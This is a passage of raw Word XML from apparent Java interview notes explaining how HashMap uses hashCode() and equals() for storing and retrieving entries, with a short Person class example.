    <w:p w14:paraId="4A4D52E1" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="0085624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ow HashMap uses hashCode() and equals() internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13715D4E" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="0085624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Storing an Entry in the Map:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F152B76"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add a key-value pair to a HashMap, it uses the following steps internally to store the entry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A313B8F" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ep 1: hashCode() Calculation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC6DA27" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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you put a key-value pair in the HashMap, the first thing that happens is that the HashMap calls the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method on the key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ABF803" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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hashCode() method computes an integer value (hash code) based on the key’s content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70567004" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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hash code is then used to determine the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bucket</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where the key-value pair should be stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F143CFE" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ep 2: Bucket Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0674B9B6" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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HashMap determines the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bucket</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (index in the underlying array) by taking the hash code and applying a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashing function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (usually index = hashCode % number of buckets).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47054200" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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number of buckets is typically a power of 2, and the hashCode is then mapped to an index within that range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC1CD66" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ep 3: Handling Collisions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F17BE6" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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multiple keys have the same hash code (or hash code maps to the same bucket), a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>collision</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232B0916" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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case of a collision, the HashMap uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linked list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>red-black tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, starting from Java 8, when the number of elements in the bucket exceeds a certain threshold) to store multiple entries in the same bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4508655D" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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ch entry in the linked list (or tree) will contain the key-value pair, and it will be checked for the correct key using the equals() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E25687D" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="0085624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Retrieving a Value from the Map:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C267D18"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retrieve a value from a HashMap using a key, the process is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B99DAF5" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ep 1: hashCode() Calculation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3871CFA8" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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hashCode() of the key is computed in the same way as when it was inserted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01383408" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ep 2: Bucket Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6430BBC5" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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hashCode is used to locate the correct bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA05C7E" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ep 3: Handling Collisions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F09309A" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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re is more than one entry in the bucket (due to collisions), the HashMap will traverse the entries (linked list or tree) in the bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9A7430" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ep 4: equals() Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1668332D" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Once it has found the right bucket, the HashMap compares each entry’s key with the provided key using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368001BE" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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equals() method returns true, it means the correct key has been found, and the corresponding value is returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF98EF" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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equals() returns false, the search continues in the next entry in the same bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222AEA88" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ep 5: If Key is Not Found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637437D9" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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no match is found in the bucket, the HashMap returns null (indicating that the key is not present in the map).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8F74DE" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="0085624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Why hashCode() and equals() are Important:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26835E36" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Code()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Determines the bucket location. A good hash function ensures that keys are evenly distributed across buckets, minimizing collisions and improving performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C2174F" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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quals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When collisions happen (multiple keys with the same hash code), the equals() method is used to distinguish between different keys. Without the proper implementation of equals(), the HashMap may not correctly handle key comparison and may lead to incorrect behavior (e.g., two different keys being considered equal or vice versa).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6904F56F" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="0085624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7E4884F4"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HashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F21787B" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0217D9A2"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Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6804D23F"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C02B626"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age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F129291" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="768D9871"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Person(String name, int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311E2A1A"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D41F571"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age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1671F3A1"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C9C1978" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B89C9FC"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7016CDFE"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int hashCode() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E97672"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name.hashCode() + age;  // Simple hash function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5871BFEA"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EDC5F4F" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07411160"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664441C6"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boolean equals(Object obj) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639C4815"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this == obj) return true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8630D5"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obj == null || getClass() != obj.getClass()) return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200C481A"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erson person = (Person) obj;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1236D681"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age == person.age &amp;&amp; name.equals(person.name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCFCA29"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A8B62AF"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0559A9B" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F190DA4"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HashMapExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2D248B"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31DFCBC7"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HashMap&lt;Person, String&gt; map = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71995EB1"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3D29E7E"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erson p1 = new Person("Alice", 30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62171AB8"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erson p2 = new Person("Bob", 25);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B68E19B"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1A3CC33"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p1, "Engineer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DDB903"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p2, "Doctor");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0F84ED" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A6B53F5"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Retrieving values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6280D25E"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map.get(p1));  // Outputs "Engineer"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03133D5D"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map.get(p2));  // Outputs "Doctor"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1425CAC4"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8E07A9B" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="0085624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6CC35AC" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="0085624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How hashCode() and equals() Work in the Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0333C528" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ng</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741F2F73" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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p1 is added to the map, its hashCode() method is called to determine the bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6C3727" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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p1 is later retrieved, the hashCode() will be used again to find the bucket, and equals() will verify if p1 matches the key in the bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318CC4FC" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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trieving</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006DCE18" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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calling map.get(p1), the hashCode() is used to find the bucket, and equals() is used to compare p1 with the existing keys to get the correct value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F881A55" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="0085624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 of Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7366D76A" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Code()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Helps locate the correct bucket for a key. It’s used to determine the array index within the underlying array of the HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B62ED1D" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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quals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Is used when there is a collision (multiple keys with the same hash code). It compares the keys in the bucket to find the correct key-value pair.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2F4D79" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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fficiency</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A good implementation of hashCode() and equals() ensures the HashMap operates efficiently with minimal collisions, which improves performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C13CE78" w14:textId="77777777" w:rsidR="00C611E7" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C611E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FBD1744">
          <v:rect id="_x0000_i1523" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC556DD" w14:textId="77777777" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="00127D9B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="169" w:name="_Toc196307649"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the types of HashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="169"/>
    </w:p>
    <w:p w14:paraId="7778B6F2" w14:textId="01FDE84F" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="00084ED0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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HashMap is a specific implementation of the Map interface, but there are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
